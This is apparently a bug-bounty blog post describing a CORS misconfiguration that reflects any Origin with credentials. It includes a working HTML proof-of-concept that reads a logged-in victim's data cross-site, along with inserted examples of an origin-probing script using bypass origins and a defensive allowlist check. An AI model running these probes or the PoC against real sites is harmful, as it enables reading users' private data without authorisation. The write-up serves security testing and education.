Having fun with an easy CORS

Manas Harsh
3 min read · Apr 30, 2020

Hi everybody,

So today I'm going to tell a short story about my recent CORS bug, which I consider easy because it was low-hanging fruit. However, sometimes we miss these easy bugs, which can get you a few bucks for sure.


So, I was looking for bounties as always and opened Bugcrowd for some programs I am comfortable with. I opened a website and did some Burp work to navigate the endpoints. As I was doing it, I saw a page like this:-

So, as you can see, the server accepts any value in the Origin request header and reflects it back in the Access-Control-Allow-Origin response header. I will not go into the details since I suppose you all know the concept of CORS (if not, please refer to this link: https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties). I changed the Origin header to my name and I got that URL back in the response, as you can see in the above screenshot.

The next step was to exploit it. Let me mention this here: if there is no sensitive data in the response, like a user ID or an email address, there is no use in exploiting it :(. One more check before writing a PoC: for the credentialed read below to work, the response must also carry Access-Control-Allow-Credentials: true next to the reflected origin; without it the browser drops the cookies and you only read what an anonymous user would see anyway. Since I was getting some personal data, I went ahead and tried to exploit it with this code:-
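Below is an added example, not code from the original post, that automates the check done by hand in Burp above: send a few attacker-chosen Origin values to the endpoint and classify what comes back, so you can tell the exploitable combination (reflected origin plus Access-Control-Allow-Credentials: true) from the harmless ones. The target URL, the attacker host names and the fake reflecting server used for the offline run are assumptions for illustration; pass the real fetch to probe a live target.

```javascript
// Added example (not from the original post): probe CORS behaviour with
// attacker-chosen Origin values and classify the response headers.

// Case-insensitive header lookup that works for a fetch Headers object or a
// plain { name: value } object, so the classifier can run offline.
function getHeader(headers, name) {
  if (typeof headers.get === "function") return headers.get(name);
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name.toLowerCase());
  return key === undefined ? null : headers[key];
}

// Classify the CORS response for the Origin we sent:
//   "none"                  no Access-Control-Allow-Origin at all
//   "wildcard"              ACAO: * (browsers never send cookies with this)
//   "fixed"                 a specific origin that is not ours
//   "reflected"             our origin echoed back without credentials:
//                           only unauthenticated content is readable cross-site
//   "reflected+credentials" echoed back AND ACAC: true: the bug in the post,
//                           an authenticated cross-site read of the body
function classifyCors(sentOrigin, headers) {
  const acao = getHeader(headers, "access-control-allow-origin");
  const acac = String(getHeader(headers, "access-control-allow-credentials") || "")
    .trim().toLowerCase() === "true";
  if (acao === null) return "none";
  if (acao === "*") return "wildcard";
  if (acao !== sentOrigin) return "fixed";
  return acac ? "reflected+credentials" : "reflected";
}

// Origins worth sending: a plain attacker origin, "null" (sandboxed iframes
// send it), and two derived from the target host that slip past the common
// prefix/suffix checks behind many reflected-Origin bugs.
function candidateOrigins(targetUrl, attackerHost = "attacker.example") {
  const host = new URL(targetUrl).hostname;
  return [
    `https://${attackerHost}`,
    "null",
    `https://${host}.${attackerHost}`, // passes startsWith("https://" + host)
    `https://evil${host}`,             // passes endsWith(host)
  ];
}

// Probe every candidate origin. fetchImpl is injectable so this runs offline.
async function probeCors(targetUrl, fetchImpl = globalThis.fetch,
                         origins = candidateOrigins(targetUrl)) {
  const out = {};
  for (const origin of origins) {
    const res = await fetchImpl(targetUrl, { headers: { Origin: origin }, redirect: "manual" });
    out[origin] = classifyCors(origin, res.headers);
  }
  return out;
}

// Constructed stand-in (assumption) for the vulnerable server in the post:
// it echoes any Origin and adds ACAC: true. Swap in the real fetch for a
// live target.
function reflectingServer(url, init) {
  const origin = init.headers.Origin;
  return Promise.resolve({
    status: 200,
    headers: {
      "Access-Control-Allow-Origin": origin,
      "Access-Control-Allow-Credentials": "true",
      "Content-Type": "application/json",
    },
  });
}

probeCors("https://target.example/api/me", reflectingServer).then((r) => console.log(r));
```

Anything that comes back as "reflected+credentials" for an origin you control is worth a PoC; "reflected" without credentials only matters if the endpoint returns something sensitive to unauthenticated callers, and "wildcard" is not exploitable for cookie-authenticated data because browsers refuse to combine `*` with credentials.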

<html>
<head>
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Show the cross-origin response body, both in an alert and in the page
      alert(this.responseText);
      document.getElementById("demo").innerText = this.responseText;
    }
  };
  // Replace with the vulnerable endpoint (full URL, including the scheme)
  xhttp.open("GET", "https://yoursitehere.com/", true);
  // Send the victim's cookies; this only works when the response carries
  // Access-Control-Allow-Credentials: true next to the reflected origin
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</head>
<body>
<center>
<h2>CORS PoC Exploit</h2>
<h3>Show full content of page</h3>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
</center>
</body>
</html>

This is a simple HTML page that works here: open it in a new tab while logged in to the target, click Exploit, and the response body, fetched with your session cookies, appears in an alert. Here is a screenshot of how it looks:-
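For contrast, here is the server-side origin check that closes this class of bug, beside the weak checks a reflected Origin usually comes from. This is an added example, not the affected site's code or anything from the original post; the allowlist entries, function names and test origins are assumptions.

```javascript
// Added example (not from the original post): weak origin checks beside a
// hardened one, and the headers each would emit.

// Assumed allowlist of first-party origins that may read responses with cookies.
const ALLOWED_ORIGINS = new Set(["https://app.example.com", "https://admin.example.com"]);

// Weak: echo whatever Origin arrived. This is the bug in the post.
function reflectAnything(origin) { return origin !== undefined; }

// Weak: prefix match; "https://app.example.com.attacker.example" passes.
function prefixCheck(origin) { return origin.startsWith("https://app.example.com"); }

// Weak: suffix match; "https://evilexample.com" passes.
function suffixCheck(origin) { return origin.endsWith("example.com"); }

// Hardened: exact match against a fixed allowlist, nothing derived from input.
function isAllowedOrigin(origin) { return ALLOWED_ORIGINS.has(origin); }

// Build the CORS response headers the way a handler would, using the given
// check. Vary: Origin is always set so caches never serve one origin's
// ACAO to another.
function corsHeaders(origin, check) {
  const headers = { Vary: "Origin" };
  if (origin !== undefined && check(origin)) {
    headers["Access-Control-Allow-Origin"] = origin;
    headers["Access-Control-Allow-Credentials"] = "true";
  }
  return headers;
}

// Run a list of origins through every check and report which ones each accepts.
function compareChecks(origins) {
  const checks = { reflectAnything, prefixCheck, suffixCheck, isAllowedOrigin };
  const result = {};
  for (const [name, check] of Object.entries(checks)) {
    result[name] = origins.filter((o) => check(o));
  }
  return result;
}

// Constructed test origins: one legitimate, three attacker-controlled.
const SAMPLE_ORIGINS = [
  "https://app.example.com",
  "https://app.example.com.attacker.example",
  "https://evilexample.com",
  "null",
];
console.log(compareChecks(SAMPLE_ORIGINS));
```

Only `isAllowedOrigin` accepts the first origin and nothing else; each weak check lets at least one attacker origin through, and once it is echoed back together with `Access-Control-Allow-Credentials: true` the PoC above reads the victim's data.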

As soon as it worked, I reported it to the website. Didn't get anything as it was a dupe, but I still got some idea of how we can make it happen in such cases. I would like to mention one of my friends, a guy with awesome ideas, Harsh Bothra, who helped me report it where it should be reported :p

I hope you got some idea about exploiting a basic CORS bug. Enjoy this till I come back with another one :) As always, suggestions are welcome, and if you find something that needs to be corrected, please let me know. Also, you can press the clap icon if you liked it :)

Stay safe, ADIÓS:)

Twitter:- @manas_hunter


Security Engineer | Synack Red Teamer | Writer | Learner, achiever & Contributor